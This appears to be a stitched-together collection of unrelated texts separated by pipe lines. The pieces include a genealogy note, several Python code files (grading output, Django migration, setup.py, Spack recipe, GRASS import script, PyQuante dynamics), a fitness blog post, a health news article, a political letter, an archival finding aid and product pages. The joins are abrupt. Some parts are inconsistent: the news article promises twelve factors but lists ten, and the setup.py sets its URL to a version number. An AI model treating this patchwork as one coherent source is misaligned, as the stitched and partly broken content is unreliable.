The government of Carroll County, Tennessee, maintains no official website; researchers must find county information at the state level. The Tennessee Vital Records Office (http://health.state.tn.us/vr/Genealogy.htm) keeps birth records for 100 years and death, marriage, and divorce records for 50 years; after that time, the records are sent to the Tennessee State Library and Archives (http://www.tn.gov/tsla/history/county/factcarroll.htm) for public access and research. To receive records directly from the Internet, inquiries should be made to VitalChek (http://www.vitalchek.com/tennessee-express-vital-records.aspx), which charges a processing fee in addition to the Vital Records Office fees. The Carroll County courthouse experienced a fire in 1931, a fact that may affect the availability of official records.
|
from openpyxl import Workbook
from webview import WebView
import gradeSettings
class outputControl():
    """Collects per-student grading results and writes them out as one
    Excel workbook plus one HTML report per course section.

    Python 2 code (print statement, dict.iteritems).
    """

    def __init__(self, sectionList, name, submissionFolder):
        # sectionList: section identifiers; name: assignment/course name;
        # submissionFolder: folder the graded submissions came from (also
        # used to build output file names).
        self.sectionList = sectionList
        self.name = name
        # studentID -> record of that student's latest submission; see insert().
        self.database = {}
        self.submissionFolder = submissionFolder
        # One (Workbook, WebView) pair per section.
        self.section = dict([(sect,{'workbook':Workbook(),'webview': WebView(name + '-' + sect + '-' + submissionFolder + '.html', submissionFolder)}) for sect in sectionList])
        for key in self.section:
            self.section[key]['worksheet'] = self.section[key]['workbook'].active
            self.section[key]['webview'].createBody()
            self.section[key]['webview'].insertTitle('Auto Grading Sheet For ' + name + ' Section:' + key)
            self.section[key]['webview'].createGradingTable()
            # Header row: fixed columns followed by one column per grading rule.
            self.section[key]['worksheet'].append(['Student Name','Student UID','Comment']+ gradeSettings.GRADING_RULES_ORDER)

    def close(self):
        # Finalize each HTML report and save each workbook into the parent
        # directory.  Called automatically at the end of dump().
        for key in self.section:
            self.section[key]['webview'].endTable()
            self.section[key]['webview'].endBody()
            self.section[key]['workbook'].save('../' + self.name + '-' + key + '-' + self.submissionFolder +".xlsx")

    def insert(self, studentName, studentID, submissionNum, partner, section, errorMessage, detailedGrade, output, fileName):
        """Record one submission, keeping only the highest submissionNum
        per student.

        Returns False when an older submission is ignored; otherwise the
        record is (over)written and None is returned.
        """
        if studentID in self.database.keys():
            print 'insert student:', studentID
            if submissionNum < self.database[studentID]['submissionNum']:
                # A newer submission is already stored -- ignore this one.
                return False
        self.database[studentID] = {
            'studentName':studentName,
            'studentID':studentID,
            'submissionNum':submissionNum,
            'partner':partner,
            'section':section,
            'errorMessage':errorMessage,
            'detailedGrade':detailedGrade,
            'output':output,
            'fileName':fileName
            }

    def dump(self):
        # Write every recorded submission into its section's HTML report and
        # worksheet, then finalize all outputs via close().
        for key, values in self.database.iteritems():
            self.section[values['section']]['webview'].insertGradingTable(values['studentName'],
                                                                          key,
                                                                          values['partner'],
                                                                          sum(values['detailedGrade']),
                                                                          values['errorMessage'],
                                                                          values['fileName'])
            # ';'-separated output is rendered as one line per item in the cell.
            self.section[values['section']]['worksheet'].append([values['studentName'], key, values['output'].replace(';','\n')] + values['detailedGrade'])
        self.close()
|
5 Ways for your family to be active during National Physical Fitness and Sports Month!
Home » 5 Ways for your family to be active during National Physical Fitness and Sports Month!
Bubble bonanza! Fun for all ages! If you are looking for a simple activity sure to capture kids' attention (especially littles) and get them moving, look no further than a bottle of bubbles!
Bike to school! National walk / bike to school day was May 10th. Missed it? No problem! Round up some neighborhood friends and repeat this on your own!
Family game night! Check out previous blog posts for ideas or fall back on some old time favorites of ours: Twister, Charades, or Simon Says.
Park playdate! Invite friends to meet you at a local park for some free play and a friendly game of kickball!
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
    # Adds the ChangeRequest model: a proposed edit to an excel_import.Cell,
    # recording the old and new values, the author, and (optionally) who
    # accepted the request and when.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('excel_import', '0007_document_current'),
    ]

    operations = [
        migrations.CreateModel(
            name='ChangeRequest',
            fields=[
                ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
                ('new_value', models.CharField(max_length=255)),
                # old_value may be blank (e.g. the cell was previously empty).
                ('old_value', models.CharField(max_length=255, blank=True)),
                ('created_on', models.DateTimeField(auto_now_add=True)),
                # accepted_on/accepted_by stay null until the request is accepted.
                ('accepted_on', models.DateTimeField(null=True, blank=True)),
                ('accepted_by', models.ForeignKey(null=True, related_name='+', blank=True, to=settings.AUTH_USER_MODEL)),
                ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
                ('target_cell', models.ForeignKey(to='excel_import.Cell')),
            ],
        ),
    ]
|
THURSDAY, May 24, 2018 (HealthDay News) -- Where you live can have a major effect on your health, new research suggests.
Living in a diverse community where people are better educated, make more money and have good health care nearby is linked to greater well-being and a better quality of life, the study authors said.
"Our communities have a big impact on our health and well-being," said study lead author Dr. Brita Roy. She's an associate professor of medicine and director of population health at Yale University Medicine in New Haven, Conn.
"This study suggests that if we are going to start working toward building communities to promote health and well-being, we need to work across sectors. Health care alone can't do it. Transportation alone can't do it. There has to be a collaborative effort to improve health and well-being for everyone," Roy said.
Feelings of well-being and satisfaction with your quality of life have been associated with a longer life and better health outcomes, the researchers noted.
But Roy pointed out that the design of the new study means researchers can't prove a cause-and-effect relationship between certain community characteristics -- such as medical, social and environmental factors -- and a sense of well-being.
"That means we don't know at this point if we improve these factors if well-being will go up," she said.
The study included more than 300,000 adults from a nationwide sample. The researchers identified 77 characteristics that they felt might contribute to peoples' well-being.
But many of those characteristics are related to one another, Roy said. For example, a low-income area might also have a higher minority population and more people with lower education. So, the researchers worked to remove duplication and narrowed the list to a dozen characteristics.
"These 12 factors accounted for more than 90 percent of the variation we see in well-being," Roy said.
Lower rates of child poverty.
Fewer people with less than a high school diploma.
Fewer people with a high school diploma/GED.
More people with a college degree.
A higher average household income.
More eligible women obtaining mammography.
Lower rates of preventable hospitalizations.
Fewer federally qualified health centers.
More people commuting by bicycle.
Fewer people commuting by public transit.
The racial make-up of a community was an important factor in its well-being.
"I was pleasantly surprised to see that a greater percentage of black residents was associated with higher well-being," Roy said. "After you account for income and education, places that are more racially mixed have higher well-being. Prior studies have shown that more diversity generally leads to more tolerance in the community and less overall stress and worry."
Another key factor was how many people commuted to work on a bicycle.
"This had a big impact on physical and mental well-being," Roy noted.
The third big factor in well-being was access to health care, especially preventive care.
"When people perceive that they have access to good medical care, it gives them peace of mind," Roy said.
Two factors Roy expected to see on the list that didn't make it were crime rates and income inequality.
Mary Rzeszut, a licensed clinical social worker in the department of behavioral health at NYU Winthrop Hospital in Mineola, N.Y., said the study underscores what hospital workers see every day.
"People who don't have access to health care have poorer outcomes and a decrease in well-being. The same is true for people with lower socioeconomic status," she said.
"The researchers really honed in on what we might do to bring forth well-being, and it will likely require thinking outside the box, like when Citibank sponsored the Citi Bike program in New York City to give people access to a bike and the ability to exercise. It helps improve quality of life and opens up other options to us," Rzeszut explained.
The study by Roy and colleagues was published online May 23 in the journal PLoS One.
|
#
# setup.py
#
from setuptools import setup
import growler_vhost
NAME = "growler_vhost"

# Short summary shown on the package index.
desc = """The Growler vhost server acts as forwarding agent for HTTP requests to
multiple domains hosted from a single server."""

# Long description (README-style).
description = """The Growler vhost server acts as forwarding agent for HTTP
requests to multiple domains hosted from a single server. This is an
implementation of the service using the _Growler_ microframework to handle the
incoming request. As with everything Growler, all events are asynchronous, and
handled when-needed.
This package comes as a binary, which can be run in the form of `growler-vhost
-c <config_file>`, specifying the path to the config file to use as parameters.
I have a hope that optimizations can be made such that forwarding the request to
another growler server takes (almost) no extra resources. As the request can
easily be parsed once into the format that the growler application already uses.
We are a long way from that, though.
"""

REQUIRES = [
    'growler'
]

KEYWORDS = [
    'vhost',
    'virtual server'
]

# Bug fix: the list previously ended with "]," which made CLASSIFIERS a
# one-element tuple containing the list, not the list itself.
CLASSIFIERS = [
    "Development Status :: 2 - Pre-Alpha",
    # "Framework :: Growler",
    "License :: OSI Approved :: Apache Software License",
    "Programming Language :: Python",
    "Programming Language :: Python :: 3",
    "Programming Language :: Python :: 3.4",
    "Topic :: Internet :: WWW/HTTP",
    "Natural Language :: English"
]

setup(
    name=NAME,
    version=growler_vhost.__version__,
    author=growler_vhost.__author__,
    license=growler_vhost.__license__,
    # NOTE(review): the original passed __version__ here as well; a project
    # URL attribute (e.g. __url__) was presumably intended -- confirm.
    url=growler_vhost.__version__,
    author_email=growler_vhost.__contact__,
    description=desc,
    long_description=description,
    keywords=KEYWORDS,
    classifiers=CLASSIFIERS,      # bug fix: missing comma here was a SyntaxError
    install_requires=REQUIRES,    # use the REQUIRES constant defined above
    packages=['growler_vhost']
)
|
It seems to me that the major issue in the campaign for president, especially this year, is leadership. We have a president who inherited a sadly neglected FBI, CIA and armed forces. After our nation was attacked on Sept. 11, 2001, President Bush reacted positively and declared the war on terrorism and invaded Afghanistan, deposing the Taliban. Afghanistan has since had free elections for the first time in its history. After watching Saddam Hussein ignore 17 demands to disarm by the United Nations, Bush made the correct decision to eliminate Hussein and his terrorist regime, which we have done. Progress in Iraq has been slow but sure. John Kerry says he would have continued negotiating--shades of Neville Chamberlain and his negotiating with another tyrant, Adolf Hitler. We do not need an appeaser as president of the United States.
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RGlobaloptions(RPackage):
    """It provides more controls on the option values such as validation and
    filtering on the values, making options invisible or private."""

    # CRAN package locations: landing page, release tarball, and the archive
    # directory used to locate older versions.
    homepage = "https://cran.r-project.org/package=GlobalOptions"
    url      = "https://cran.rstudio.com/src/contrib/GlobalOptions_0.0.12.tar.gz"
    list_url = "https://cran.r-project.org/src/contrib/Archive/GlobalOptions"

    # (version, md5 checksum of the tarball)
    version('0.0.12', '6c268b3b27874918ba62eb0f6aa0a3e5')

    # R package dependencies, needed both to build and to run.
    depends_on('r-testthat', type=('build', 'run'))
    depends_on('r-knitr', type=('build', 'run'))
    depends_on('r-markdown', type=('build', 'run'))
|
Archibald E. Roberts (1915-2005) was a retired lieutenant colonel and founder of the Committee to Restore the Constitution. The collection consists of Roberts' correspondence, speeches, and writings as well as numerous boxes of printed and audio-visual propaganda from Roberts' personal collection.
Archibald E. Roberts (1915-2005) was a retired lieutenant colonel and founder of the Committee to Restore the Constitution. He was born in Cheboygan, Michigan. Roberts was educated at the Command and General Staff College, the Armed Forces Information School, the Airborne School, and the Medical Field Service School. Roberts, an ex-paratrooper, served with the 11th Airborne Division, the 187th Airborne Regimental Combat Team, the 101st Airborne Division, and the 3rd Infantry Division as an Army information officer.
While under the command of General Edwin A. Walker in Augsburg, Germany, 1959-1960, Roberts served as a special projects officer. He wrote and directed the 24th Infantry Division “Pro Blue” troop information program which became the central issue in the 1962 Senate “military muzzling” investigations. He was relieved of active duty by order of the Secretary of the Army, Cyrus R. Vance, on May 7, 1962, following a speech before the Daughters of the American Revolution in Washington, D.C.
Roberts became a successful litigant against the Secretary of the Army and other Pentagon officials in a law suit involving freedom of speech and military personnel. Roberts recovered pay, allowances, and reinstatement to active duty. He voluntarily retired in 1965.
Roberts established the Committee to Restore the Constitution, a non-profit Colorado corporation, in Fort Collins, and served as its director. He helped establish affiliate committees in New York, Illinois, Wisconsin, Texas, and other places. He addressed joint sessions of the Alabama and Mississippi state legislatures and testified before many state committees. He conferred with many state office holders on issues of regional government and land control.
Roberts was an active public speaker on such topics as the United Nations, bussing, world government, and the economic problems facing the United States. He is the author of Victory Denied, The Anatomy of a Revolution, PEACE, by the Wonderful People Who Brought You Korea and Vietnam, and other works on the United Nations and world government. Roberts was the recipient of numerous awards including Noteworthy American, 1978 from the Historical Preservations of America, and the Liberty Award, 1976, from the Congress of Freedom.
The collection consists of Roberts' correspondence, speeches, and writings as well as numerous boxes of printed and audio-visual propaganda from Roberts' personal collection.
The initial accession includes correspondence, speeches, writings, tape recordings, and miscellaneous documents.
Outgoing correspondence includes personal correspondence from 1953-1965, and correspondence related to the Committee to Restore the Constitution from 1965-1976. Incoming correspondence covers the period from 1953-1974. Major correspondents include: Gordon Allott, Jane Thompson (Arizona Women for Constitutional Government), Frazer Arnold, Billy James Hargis (Christian Crusade), Myron C. Fagan (Cinema Educational Guild, Inc.), Craighill, Aiello, Gasch & Craighill, Pedro A. del Valle (Defenders of the Constitution, Inc.), George B. Fowler, Charles Hallberg, Liberty Lobby, Corliss C. Moseley, National Economic Council, Inc., New Yorkers for the Constitution, Inc., Jack Poorbaugh, Strom Thurmond, George Wallace, and Women for Constitutional Government.
Roberts writings include drafts of mailings and supplements as well as some published works. There is also a container of tape recordings including Land Control Laws-Do They Cancel Your Private Property Rights? and Regional Government, a speech before the Indiana State Legislature.
Miscellaneous documents include but are not limited to transcripts of the Committee to Restore the Constitution's Action Line Broadcast, mailing lists, and financial statements. There are also two folders of material related to General Edwin A. Walker.
Accession Up 611.M: audiovisual materials including Regionalism, a video presentation on a non-vhs tape.
Accession 85.406x.M / Up 126 includes cassette tapes and video recordings of Archibald Roberts discussing the Federal Reserve system, May 23, 1984.
Accession 00.014.M / Up 097 includes a video cassette copy of Real Genius with a letter addressed to Roberts wrapped around it, and carefully placed inside the packaging for an antiquated computer program as well as collected conservative publications.
Accession Up 120.M includes envelopes containing audio cassettes in the Dr. Beter Audio Letter series as well as reel to reels and miscellaneous conservative publications.
Accession 12.032.M includes audio tapes, pamphlets, and miscellaneous conservative mailings.
Accession Up 612.M includes audio tapes and miscellaneous conservative mailings.
Accession 85.387x.M / Up 121 includes audio tapes and miscellaneous conservative mailings.
Accession 98.026.M / Up 886 includes audio tapes and miscellaneous conservative mailings.
Accession Up 609.M includes miscellaneous conservative mailings.
Accession 81.26.M / Up 610 includes miscellaneous conservative mailings.
Accession Up 613.M includes miscellaneous conservative mailings.
Accession Up 617.M includes miscellaneous conservative mailings.
Accession Up 693.M includes miscellaneous conservative mailings.
Accession 85.384x.M / Up 122 includes miscellaneous conservative mailings.
Accession 85.407x.M / Up 123 includes miscellaneous conservative mailings.
Accession 85.409x.M / Up 608 includes miscellaneous conservative mailings.
Accession 85.411x.M / Up 699 includes miscellaneous conservative mailings.
Accession 89.02.M / Up 606 includes collected conservative publications.
Accession 90.66.M. / Up 699 includes collected conservative serial publications and pamphlets.
[Identification of item], Archibald Roberts collection, Ax 824, Special Collections & University Archives, University of Oregon Libraries, Eugene, Oregon.
The original accession is arranged into the following series: Correspondence, Speeches, Writings, Publications, and Miscellaneous. Subsequent accessions have little to no intellectual or physical arrangement. Any arrangement may have derived from the records' creators or custodians. It may be necessary to look in multiple places for the same types of materials.
Committee to Restore the Constitution--Records and correspondence.
Finding aid prepared by Austin Munsell and Kira B. Homo.
|
#!/usr/bin/env python
#
# $Id: DisabledUnitTestTest.py 4193 2011-01-04 23:19:42Z dhh1969 $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import sys, os, _testcase
from unittest2 import TestCase, skip
from codescan.disabled_unit_test import *
from testsupport import checkin, officialbuild
# We're beginning the string constant in an odd way so we don't
# cause this file to show up in the list of those containing
# a disabled unit test.
# A well-formed "disabled unit test" marker block.  (The leading '/' is
# concatenated separately so this file itself is not detected -- see the
# comment above.)  validateDut() below checks each field of this text.
DESC = '/' + '''*
UNIT TEST TEMPORARILY DISABLED
By: your name
When: 2011-02-27
Ticket: #295
Which: testFoo
Where: all 32-bit platforms
Owner: fred@flintstones.org, barney@rubble.org
Why: description of problem, including copy-and-paste
from error log
*/'''

# Preamble of inactive preprocessor text and comments placed before DESC,
# so the parser must skip non-code regions to find the marker.
PREFIX = '''
#if 0
this is inactive text
#if 1
this is also inactive
#endif
#endif
/**
* some more text that's inactive
*/
''' + DESC

# Character offset of DESC within PREFIX; used as the marker span start.
OFFSET = PREFIX.find(DESC)

# Code fragments appended after the marker to simulate the disabled test
# in C++ (two variants) and Java.
CPP_SUFFIX1 = '''
// a comment
SIMPLE_TEST(foo)'''
CPP_SUFFIX2 = '''/*
SOME MORE COMMENTS
*/
class SpecialTest: public SomethingTest {
}'''
JAVA_SUFFIX = '''//@Test
public void testSomething() {
}'''
@skip("9/16/2011 this test can't be run until we finish work on the test runner -- Julie Jones")
@officialbuild
class DisabledUnitTestTest(_testcase.TestCaseEx):
    """Tests DisabledUnitTest's parsing of a disabled-test marker block for
    C++ and Java source suffixes."""

    def validateDut(self, dut, errors, txt=None):
        """Check every parsed property of *dut* and assert no mismatches.

        errors is the mismatch count accumulated so far by the caller.
        txt, when given, is the source text dut was parsed from and is
        printed with line numbers on a lineNum mismatch.  (Bug fix: the
        original referenced an undefined name ``txt`` here, raising
        NameError instead of printing.)
        """
        errors += self.checkProp(dut, 'ticket', '295')
        errors += self.checkProp(dut, 'which', 'testFoo')
        errors += self.checkProp(dut, 'where', 'all 32-bit platforms')
        errors += self.checkProp(dut, 'when', '2011-02-27')
        errors += self.checkProp(dut, 'by', 'your name')
        errors += self.checkProp(dut, 'owner', 'fred@flintstones.org, barney@rubble.org')
        errors += self.checkProp(dut, 'why', 'description of problem, including copy-and-paste from error log')
        errorsX = self.checkProp(dut, 'lineNum', '11')
        if errorsX and txt is not None:
            self.printWithLineNums(txt)
        # Bug fix: lineNum mismatches previously did not count toward the
        # final assertion.
        errors += errorsX
        self.assertEquals(0, errors)

    def testDisabledUnitTestPropertiesCppSuffix1(self):
        txt = PREFIX + CPP_SUFFIX1
        dut = DisabledUnitTest('bar/footest.cpp', txt, OFFSET, OFFSET + len(DESC))
        errors = self.checkProp(dut, 'path', 'bar/footest.cpp')
        self.validateDut(dut, errors, txt)

    def testDisabledUnitTestPropertiesCppSuffix2(self):
        txt = PREFIX + CPP_SUFFIX2
        dut = DisabledUnitTest('bar/footest.cpp', txt, OFFSET, OFFSET + len(DESC))
        errors = self.checkProp(dut, 'path', 'bar/footest.cpp')
        self.validateDut(dut, errors, txt)

    def testDisabledUnitTestPropertiesJavaSuffix(self):
        txt = PREFIX + JAVA_SUFFIX
        dut = DisabledUnitTest('bar/footest.java', txt, OFFSET, OFFSET + len(DESC))
        errors = self.checkProp(dut, 'path', 'bar/footest.java')
        self.validateDut(dut, errors, txt)
|
High quality rubber damper that reduces noise and vibration significantly.
Pack of four savers designed for recurve bows. It controls the vibration of the limb, allowing for faster arrow speeds. Available in 4 colours.
|
#!/usr/bin/env python
############################################################################
#
# MODULE: v.in.gns
#
# AUTHOR(S): Markus Neteler, neteler itc it
# Converted to Python by Glynn Clements
#
# PURPOSE: Import GEOnet Names Server (GNS) country files into a GRASS vector map
# http://earth-info.nga.mil/gns/html/
# -> Download Names Files for Countries and Territories (FTP)
#
# Column names: http://earth-info.nga.mil/gns/html/help.htm
#
# COPYRIGHT: (c) 2005 GRASS Development Team
#
# This program is free software under the GNU General Public
# License (>=v2). Read the file COPYING that comes with GRASS
# for details.
#
# TODO: - see below in the code
# - add extra columns explaining some column acronyms,
# e.g. FC (Feature Classification)
#############################################################################
#%module
#% description: Imports US-NGA GEOnet Names Server (GNS) country files into a GRASS vector points map.
#% keywords: vector
#% keywords: import
#% keywords: gazetteer
#%end
#%option G_OPT_F_INPUT
#% description: Name of input uncompressed GNS file from NGA (with .txt extension)
#%end
#%option G_OPT_V_OUTPUT
#% required: no
#%end
import sys
import os
from grass.script import core as grass
from grass.script import vector as vgrass
def main():
    """Convert an uncompressed GNS country file into a GRASS vector map.

    Reads the module-level ``options`` dict populated by grass.parser() in
    the __main__ block: 'input' is the tab-separated GNS .txt file from
    NGA, 'output' the vector map name (defaults to the input's basename).
    Fails unless the current location is LatLong/WGS84.
    """
    fileorig = options['input']
    filevect = options['output']
    if not filevect:
        # Default output name: input file name without the .txt extension.
        filevect = grass.basename(fileorig, 'txt')
    #are we in LatLong location?
    s = grass.read_command("g.proj", flags='j')
    kv = grass.parse_key_val(s)
    if kv['+proj'] != 'longlat':
        grass.fatal(_("This module only operates in LatLong/WGS84 locations"))
    #### setup temporary file
    tmpfile = grass.tempfile()
    # (GNS file column header, "dbcolumn sqltype") pairs, in file order.
    # DB column names are shortened to fit the DBF 10-char limit -- see the
    # "modifications" note near the end of this function.
    coldescs = [("RC", "rc integer"),
                ("UFI", "uf1 integer"),
                ("UNI", "uni integer"),
                ("LAT", "lat double precision"),
                ("LONG", "lon double precision"),
                ("DMS_LAT", "dms_lat varchar(6)"),
                ("DMS_LONG", "dms_long varchar(7)"),
                ("UTM", "utm varchar(4)"),
                ("JOG", "jog varchar(7)"),
                ("FC", "fc varchar(1)"),
                ("DSG", "dsg varchar(5)"),
                ("PC", "pc integer"),
                ("CC1", "cci varchar(2)"),
                ("ADM1", "adm1 varchar(2)"),
                ("ADM2", "adm2 varchar(200)"),
                ("DIM", "dim integer"),
                ("CC2", "cc2 varchar(2)"),
                ("NT", "nt varchar(1)"),
                ("LC", "lc varchar(3)"),
                ("SHORT_FORM", "shortform varchar(128)"),
                ("GENERIC", "generic varchar(128)"),
                ("SORT_NAME", "sortname varchar(200)"),
                ("FULL_NAME", "fullname varchar(200)"),
                ("FULL_NAME_ND","funamesd varchar(200)"),
                ("MODIFY_DATE", "mod_date date")]
    colnames = [desc[0] for desc in coldescs]
    # Map column name -> True when the SQL type is integer (empty fields in
    # integer columns must be written as '0' below).
    coltypes = dict([(desc[0], 'integer' in desc[1]) for desc in coldescs])
    header = None
    num_places = 0
    # Python 2 builtin file(); re-emit the tab-separated input as a
    # ';'-separated temp file in coldescs order for v.in.ascii.
    inf = file(fileorig)
    outf = file(tmpfile, 'wb')
    for line in inf:
        fields = line.rstrip('\r\n').split('\t')
        if not header:
            # First line is the column header of the GNS file.
            header = fields
            continue
        vars = dict(zip(header, fields))
        fields2 = []
        for col in colnames:
            if col in vars:
                if coltypes[col] and vars[col] == '':
                    fields2.append('0')
                else:
                    fields2.append(vars[col])
            else:
                # Column absent from this file: '0' for integers, '' otherwise.
                if coltypes[col]:
                    fields2.append('0')
                else:
                    fields2.append('')
        line2 = ';'.join(fields2) + '\n'
        outf.write(line2)
        num_places += 1
    outf.close()
    inf.close()
    grass.message(_("Converted %d place names.") % num_places)
    #TODO: fix dms_lat,dms_long DDMMSS -> DD:MM:SS
    # Solution:
    # IN=DDMMSS
    # DEG=`echo $IN | cut -b1,2`
    # MIN=`echo $IN | cut -b3,4`
    # SEC=`echo $IN | cut -b5,6`
    # DEG_STR="$DEG:$MIN:$SEC"
    #modifications (to match DBF 10 char column name limit):
    # short_form   -> shortform
    # sort_name    -> sortname
    # full_name    -> fullname
    # full_name_sd -> funamesd
    # pump data into GRASS:
    # x=5/y=4 are the 1-based positions of lon/lat in the coldescs order.
    columns = [desc[1] for desc in coldescs]
    grass.run_command('v.in.ascii', cat = 0, x = 5, y = 4, fs = ';',
                      input = tmpfile, output = filevect,
                      columns = columns)
    grass.try_remove(tmpfile)
    # write cmd history:
    vgrass.vector_history(filevect)
if __name__ == "__main__":
    # grass.parser() parses the #%option blocks above and populates the
    # module-level options/flags read by main().
    options, flags = grass.parser()
    main()
|
At Sarica, we provide fast reliable service in diverse industries from the Aerospace, Defense, Automotive, and Industrial markets. We build quality parts, that are represented on many airborne platforms such as 747, 787, A320, MH-60, CH-47, and F-22.
We specialize in manufacturing to your designs or we can offer you technical assistance in engineering a product for you.
We can manufacture a customized harness for any application. Low to mid volume units can be built to your specifications, or our engineering staff can develop a design for your application. We have a large inventory of tooling to support terminals and contacts from Amp, Molex, Panduit, Pioneer, LEMO, and many others. We can qualify your product for unique applications.
Sarica offers complete circuit card manufacturing from surface mount to leaded applications. We are a leader in producing metal core LED products for military applications. We can produce your boards using tin/lead solder for defense applications. We can apply conformal coating in applications that see more harsh environments. You can supply the kits complete or Sarica will procure all material including the PCB.
© 2019 Copyright Sarica Manufacturing.
|
"""\
Dynamics.py: Module for molecular dynamics
This program is part of the PyQuante quantum chemistry program suite.
Copyright (c) 2004, Richard P. Muller. All Rights Reserved.
PyQuante version 1.2 and later is covered by the modified BSD
license. Please see the file LICENSE that is part of this
distribution.
"""
from NumWrap import array,zeros
from Constants import Rgas
from math import sqrt,pow
from IO import append_xyz
# Derivation of units for Force constant: (Thanks to Alejandro Strachan)
# We have accel in (kcal/mol)/(A*g/mol) and we want it in A/ps^2
# (kcal/mol)/(A*g/mol) = kcal/(A*g) = 1000 kcal/(A*kg)
# = 1000 kcal/(A*kg) * 4.184 J/cal = 4184 kJ/(A*kg)
# = 4.184e6 (kg m^2/s^2)/(A*kg) = 4.184e6 m^2/s^2/A
# = 4.184e26 A/s^2 = 418.4 A/(ps^2)
fconst = 418.4 # convert (kcal/mol)/(A*g/mol) to A/ps^2
# The inverse of this quantity transforms back from amu*(A^2/ps^2) to kcal/mol
def Dynamics(atoms,EnergyForces,nsteps=1000,Ti=298,dt=1e-3):
xyz = open('pyqmd.xyz','w')
dat = open('pyqmd.dat','w')
set_boltzmann_velocities(atoms,Ti)
Etot = 0
for step in xrange(nsteps):
append_xyz(xyz,atoms.atuples(),"PQMD %4d E = %10.4f" % (step,Etot))
try:
Ev,F = EnergyForces(atoms)
except:
print "Using averaging to try and converge"
Ev,F = EnergyForces(atoms,0.5)
set_forces(atoms,F)
LeapFrogUpdate(atoms,dt)
#for atom in atoms: flask.bounce(atom)
Ek = get_kinetic(atoms)
T = get_temperature(atoms)
#rescale_velocities(atoms,Ti) # uncomment for iso-kinetics
Etot = Ev+Ek
print step*dt,Etot,Ev,Ek,T
dat.write("%10.4f %10.4f %10.4f %10.4f %10.4f\n" %
(step*dt,Etot,Ev,Ek,T))
dat.flush()
return
def get_kinetic(atoms):
    """Return the kinetic energy (kcal/mol) from the stored v(t) velocities."""
    # atom.v0 holds v(t), the average of the two half-step leap-frog
    # velocities; dividing by fconst converts amu*A^2/ps^2 to kcal/mol.
    total_mv2 = sum(atom.mass()*atom.v0.squared() for atom in atoms)
    return 0.5*total_mv2/fconst
# There's a disconnect here, in that the kinetic energy is being
# computed with v0 (v(t)) and the temperature is being computed
# at v (v(t+dt/2))
def get_temperature(atoms):
    """Return the instantaneous temperature (K) from the v(t+dt/2) velocities."""
    total_mv2 = 0
    for atom in atoms:
        total_mv2 += atom.mass()*atom.v.squared()
    # 3N-6 internal degrees of freedom; the factor 1000 matches the
    # units of Rgas, and fconst undoes the amu*A^2/ps^2 scaling.
    return 1000*total_mv2/((3*len(atoms)-6)*Rgas*fconst)
def LeapFrogUpdate(atoms,dt):
    """Advance positions and velocities one step with leap-frog Verlet.

    Implements
        v(t+dt/2) = v(t-dt/2) + dt*a(t)
        r(t+dt)   = r(t) + dt*v(t+dt/2)
    so that positions (at dt, 2dt, 3dt, ...) leap-frog over velocities
    (at dt/2, 3dt/2, 5dt/2, ...).
    """
    for atom in atoms:
        mass = atom.mass()
        # a = F/m; fconst converts the force units to A/ps^2.
        accel = -atom.F*fconst/mass
        v_half = atom.v + dt*accel          # v(t+dt/2)
        # Stash v(t) = average of the two half-step velocities so the
        # kinetic energy/temperature can be computed later.
        atom.v0 = 0.5*(v_half+atom.v)
        atom.r += dt*v_half                 # r(t+dt)
        atom.v = v_half
    return
def set_forces(atoms,F):
    """Attach force vector F[i] to atoms[i] as a 3-component array in atom.F."""
    for idx, atom in enumerate(atoms):
        fx,fy,fz = F[idx]
        atom.F = array((fx,fy,fz))
    return
def set_boltzmann_velocities(atoms,T):
    """Assign random velocities consistent with temperature T (K).

    Each Cartesian component is drawn around the Boltzmann average speed
    with a random sign; the center-of-mass drift is then removed and the
    velocities rescaled to hit T exactly.
    """
    from random import gauss,randint
    # kT/2 per degree of freedom (kJ/mol).
    Eavg = Rgas*T/2000
    for atom in atoms:
        mass = atom.mass()
        # Per-component average speed from (1/2) m v^2 = Eavg.
        vavg = sqrt(2*Eavg*fconst/mass)
        stdev = 0.01  # NOTE(original author): the std dev is set wrong here
        components = []
        for _ in range(3):
            # Random sign times a Gaussian speed (randint drawn first,
            # matching the original left-to-right evaluation order).
            components.append(pow(-1,randint(0,1))*gauss(vavg,stdev))
        atom.v = array(tuple(components))
    subtract_com_velocity(atoms)
    rescale_velocities(atoms,T)
    return
def subtract_com_velocity(atoms):
    """Remove the center-of-mass drift so the system has zero net momentum."""
    drift = get_vcom(atoms)
    for atom in atoms:
        atom.v -= drift
    return
def rescale_velocities(atoms,T):
    """Uniformly scale all velocities so the instantaneous temperature is T."""
    current_T = get_temperature(atoms)
    factor = sqrt(T/current_T)
    for atom in atoms:
        atom.v *= factor
    return
def get_vcom(atoms):
    """Return the mass-weighted (center-of-mass) velocity as a 3-vector."""
    total_momentum = zeros(3,'d')
    total_mass = 0
    for atom in atoms:
        mass = atom.mass()
        total_momentum += mass*atom.v
        total_mass += mass
    return total_momentum/total_mass
if __name__ == '__main__':
    # Smoke test: 3 MD steps of RDX at 4000 K using MINDO/3 forces.
    # NOTE(review): the xyz path is hard-coded to the original author's
    # home directory and will not exist elsewhere.
    from MINDO3 import get_energy_forces
    from Molecule import Molecule
    rdx = Molecule('RDX',filename='/home/rmuller/gallery/rdx.xyz')
